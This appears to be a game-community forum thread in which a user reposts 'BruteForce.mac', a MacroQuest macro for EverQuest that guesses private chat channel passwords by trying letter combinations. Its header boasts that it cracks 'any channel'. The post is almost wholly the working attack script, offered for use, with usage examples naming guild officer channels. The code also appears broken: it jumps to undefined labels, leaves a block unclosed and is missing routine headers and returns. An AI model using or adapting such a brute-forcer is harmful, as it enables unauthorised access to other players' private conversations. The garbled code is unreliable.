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What's the channel hack macro again? (1 Viewer)

do yo mien "BruteForce.mac" ?

Rich (BB code):
| Channel Brute Forcer, figure out the password for any channel.
| BruteForce.mac by Ccomp5950
| With Thanks to Alatyami for Eyeballing it.
| Fuck private channels

#chat chat
#Event Wrong "#*#password for#*#"
#Event Debug "[MQ2] Debug"

#turbo 40

Sub Main(string parama,int paramb)
/declare Spam         int    outer 1
/declare Dbug         int    outer 1
/declare Channel      string outer ${parama}
/declare Length       int    outer ${paramb}
/declare TextString   string outer abcdefghijklmnopqrstuvwxyz
/declare Test	      string outer
/declare X            int    outer 0
/declare Y            int    outer 1
/declare Z            int    outer 0
/declare WaitTimer    timer  outer 5s
/declare Continue     int    outer 1
/declare Key[16]      int    outer 1
/declare ArrayLoop    int    outer 1
/declare ArrayLoopb    int    outer 2
/declare T	      int    outer 1
/declare TestBuild    string outer

/if (${Channel.Length}<2) /call no_param
/if (${Length}==0) /varset Length 8

/Echo Brute forcing Channel: ${Channel}
/Echo Using a maximum of ${Length} characters
/call Setup

|Does First letter here

/For Z 1 to ${TextString.Length}
		/varset Test ${TextString.Mid[${Z},1]}
		/if (${Spam}) /Echo Trying ${Test}
		/join ${Channel}:${Test}
		/varset WaitTimer 5s
		/if (${WaitTimer}==0) /call WIN
		/if (${Continue}==0) /goto :waitloop
		/varset Continue 0
/next Z

/varset Key[1] 1

|Now doing 2nd, and (N)th letters
/varset Y 1
		/For T 1 to ${TextString.Length}
			/call SetKey ${Y}
			/varset Test ${Test}${TextString.Mid[${T},1]}
			/if (${Spam}) /Echo Trying ${Test}
			/join ${Channel}:${Test}
			/varset WaitTimer 5s
			/if (${WaitTimer}==0) /call WIN
			/if (${Continue}==0) /goto :waitloop2
			/varset Continue 0
			/delay 0
		/next T
/call ChangeKey
/goto :BigLoop

Sub ChangeKey
/varcalc Key[${Y}] ${Key[${Y}]}+1
|=================================================  ===========
| Make sure the array's key position didn't just roll over
|=================================================  ===========
/for ArrayLoop ${Y} downto 1
/varcalc X ${ArrayLoop}-1
	/if (${Key[${ArrayLoop}]}>${TextString.Length}) {
		/if (${ArrayLoop}==1) /varcalc Y ${Y}+1
		/if (${ArrayLoop}>1) /varcalc Key[${X}] ${Key[${X}]}+1
		/varset Key[${ArrayLoop}] 1
		/if (${Key[${ArrayLoop}]}==1) /if (${Y}==${Length}) /call Lose
/next ArrayLoop		

Sub SetKey
/for ArrayLoopb 1 to ${Y}
	/if (${ArrayLoopb}==1) /varset Test ${TextString.Mid[${Key[1]},1]}
	/if (${ArrayLoopb}>1) /varset Test ${Test}${TextString.Mid[${Key[${ArrayLoopb}]},1]}
/next ArrayLoopb

Sub Lose
/echo Password is either longer or you need to expand your test string
/echo to alpha numeric or include UPPERCASE letters

Sub no_param
/echo No Parameters were given
/echo Usage:  /mac Bruteforce "Channel_Name", Length_of_Password
/echo Example:  /mac Bruteforce "Guildofficers", 8

/echo ==================
/echo ==================
/echo Password for ${Channel} is ${Test}
/if (${Macro.RunTime}>60) /echo Time spent:  ${Math.Calc[${Float[${Macro.RunTime}/60]}].Int} Minutes
/if (${Macro.RunTime}<=60) /echo Time Spent: ${Macro.RunTime} Seconds
/leave ${Channel}

Sub Event_Wrong
/varset Continue 1
/doevents flush

Sub Setup
/for X 1 to ${Length}
/varset Key[${X}] 1
/next X

Sub Event_Debug
/delay 5
/goto :yeah

Credit goes to Ccomp5950 With Thanks to Alatyami.

But if my reposting it helped you out, feel free to toss me a red cent
What's the channel hack macro again?

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